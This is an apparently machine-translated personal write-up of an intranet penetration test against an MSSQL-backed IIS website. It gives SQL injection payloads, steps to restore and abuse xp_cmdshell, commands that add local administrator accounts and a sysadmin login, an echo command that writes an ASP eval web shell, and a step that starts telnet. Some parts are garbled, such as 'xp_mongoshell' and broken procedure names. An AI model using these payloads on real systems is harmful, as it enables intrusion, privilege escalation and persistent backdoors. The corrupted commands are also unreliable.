Record an intranet penetration test experience

When I first came into contact with security tests, there was no such concept as a system. My predecessors still had an intranet test website and asked me to take down the shell. Then I began to work on the platform.

First of all, there must be an idea to do penetration testing, so you cannot work hard. So I started to solve the problem as follows:

Determine whether there are SQL injection points, and determine the database type based on the SQL injection points. If it is mssqlserver, check the Stored Procedure xp_mongoshell to see if it is disabled. If it is not disabled, after the injection point, you can directly use the xp_mongoshell stored procedure to add permissions to the system.

Determine whether the upload vulnerability exists. This vulnerability mainly involves uploading a single sentence script such as asp, obtaining webshell first, and then obtaining the System shell Using webshell.

The main method is to use sa, which is roughly the same as the first method.

The implementation of these ideas is as follows.

First, for IDEA 1:

Since it is to judge whether there is SQL injection, the most convenient method is to use tools for scanning. Here I am using webcruiser, a very small tool, of course, I will certainly be able to scan for the SQL Injection Vulnerability here. I can continue to use this tool to obtain database information, and here I will directly check whether xp_mongoshell can be executed at this SQL injection point.

The specific method is as follows:

Determine the database type:

? Id = 1234; and (select count (*) from sysobjects)> 0

Obtain the current connection name and database name to check whether the connection is sa.

? Id = 1234; and user> 0 (sa is displayed if dbo is displayed ).

? Id = 1234; and db_name ()> 0. When an exception is executed, you can obtain the name of the currently connected database.

Check whether xp_cmdshell is disabled.

? Id = 1234; and (select count (*) from master. dbo. sysobjects where xtype = "X" and name = 'xp _ Your shell ')

If the stored procedure is deleted, try to restore it.

? Id = 1234; and exec sp_addextendepro xp_cmdshell, 'xp log70. dll'

If the following error occurs, try the following method:

L unable to load the DLL xpsql70.dll or a DLL referenced by the DLL. Cause 126 (the specified module cannot be found ).

Execute exec sp_dropextendeproc "xp_cmdshell" first, then execute sp_addextendeproc "xp_cmdshell", "xpsql70.dll"

L unable to find the xp_mongoshell function in xpweb70.dll. Cause 127

First execute exec sp_dropextendeproc "xp_cmdshell", then execute exec sp_addextendeproc "xp_cmdshell", "xpweb70.dll"

The stored procedure is used to add users.

? Id = 1234; exec master .. xp_mongoshell "net user aaa bbb/add" -- where aaa is the user name and bbb is the password.

Add to Administrator group:

? Id = 1234; exec master .. xp_cmdshell "net localgroup administrators aaa/add"

If you want to back up the database, use:

? Id = 1234; exec backup database name to disk = 'C: \ inetpub/wwwroot \ save. db', of course, the premise is to know the web virtual path.

Of course, when you know the web virtual path, you can create a unicode vulnerability to control the computer.

? Id = 1234; exec master .. xp_cmdshell "copy c: \ windows \ system32 \ cmd.exe c: \ inetpub \ scripts \ cmd.exe"

The above mainly uses the xp_mongoshell method. If the method does not work, it should be another matter.

Solution 2:

 

Since a file is uploaded, the first task is to find various upload paths. After half a day of exploration at the front-end, I did not find a function that can be uploaded, And then I used the background upload function, by looking for various background information, the admin background is found helpless. the user name and password cannot be verified. From the database, there is no corresponding user name or password, therefore, this background is basically an invalid background, and there is no way to do it. As you can see, the upload path will become invalid. At this time, I used webcruiser to scan the entire website, the idea is that the software has the cmd mode and can be successfully executed. Since the front and back ends of the application cannot be uploaded, why not directly use the cmd command here to create an asp file? The premise is to know where the web virtual path is.

 

Generally, the web virtual path is like C: \ inetpub \ wwwroot; D: \ inetpub \ wwwroot;

Or E: \ inetpub \ wwwroot and so on. The virtual executable directory is generally C: \ inetpub \ scripts; D: \ inetpub \ scripts; E: \ inetpub \ scripts

Next, run the following command under the cmd command:

Echo ^ <^ % execute ^ (request ^ ("eval" ^) ^ % ^> c: \ inetpub \ wwwroot \ cms \ test123456.asp

In this directory, a Trojan asp file is generated, and then connected by a kitchen knife. OK and webshell are obtained.

Webshell is not the most important, and webshell does not have much function. Therefore, we try to use webshell to send our attack files to the corresponding directory, I tried several directories and found no executable directories. When I was about to give up, I tried the directory C: \ recycle and found that I could upload executable files, the following is simple.

The next step is to upload a software package and execute the system permission adding operation. In the process of doing so, we still encountered a lot of difficulties. For example, the Swiss army knife that began to upload wanted to execute the operation of Adding users through the rebound port, and we found that the operation could not be successful.

Sorry, this 0-day overflow software is so powerful, and I still have a backdoor to execute "C: \ windows \ system32 \ cmd.exe "" net user 111 111/add "successfully added users. Haha, of course, if you want to add users to the Administrator group, you can use the" C: \ windows \ system32 \ cmd.exe "" net localgroup administrators 111/add "is basically OK. So far, a simple penetration test for obtaining system permissions is complete.

Here, we can directly use the cmd command in webcruiser to directly execute the add user operation, saving the subsequent operations. It was only later thought of, alas...

Thought 3:

Since xp_mongoshell can be executed, we can try sa. For example, first create a user in the database and then promote the user to sysadmin, after using the query analyzer to connect, you still need to use the stored procedure of xp_mongoshell.

The specific method is as follows:

First, create a database user:

? Id = 1234; exec master. dbo. sp_addlogin user;

Of course, you can also assign a password to this user. In fact, it doesn't matter. If you give the password, perform the following operations:

? Id = 1234; exec master. dbo. password null, password, user;

Here, null is the old password, and password is the new password.

Then, the user is granted the following permissions:

? Id = 1234; exec master. dbo. sp_addsrvrolemember user, sysadmin;

 

After the upgrade is successful, you can query the analyzer connection. After the connection is successful, you can directly check whether xp_mongoshell can be used. If yes, you can directly upgrade the permission operation. For example:

 

Xp_cmdshell ‘net user’Xp_cmdshell ‘net user test123 test123 /add’Xp_cmdshell ‘net localgroup administrators test123/add ’Xp_cmdshell ‘net user test123 /del’

.

Enable the telnet service:

Xp_cmdshell 'net start tlntsvr'

Summary:

During this period, I learned that webshell and shell are not the same thing, that xp_cmdshell can obtain system permissions, and that some tools can execute cmd commands, of course, I also have a preliminary understanding of the use of a series of attack tools such as Swiss Army Knife Brazilian barbecue, and of course I have learned that some systems can be 0-day. Although there are still many things I don't know about this penetration, although I only have a rough understanding of it, I should have a good idea and reference for this in the future. Security is a long way to go and encourage yourself.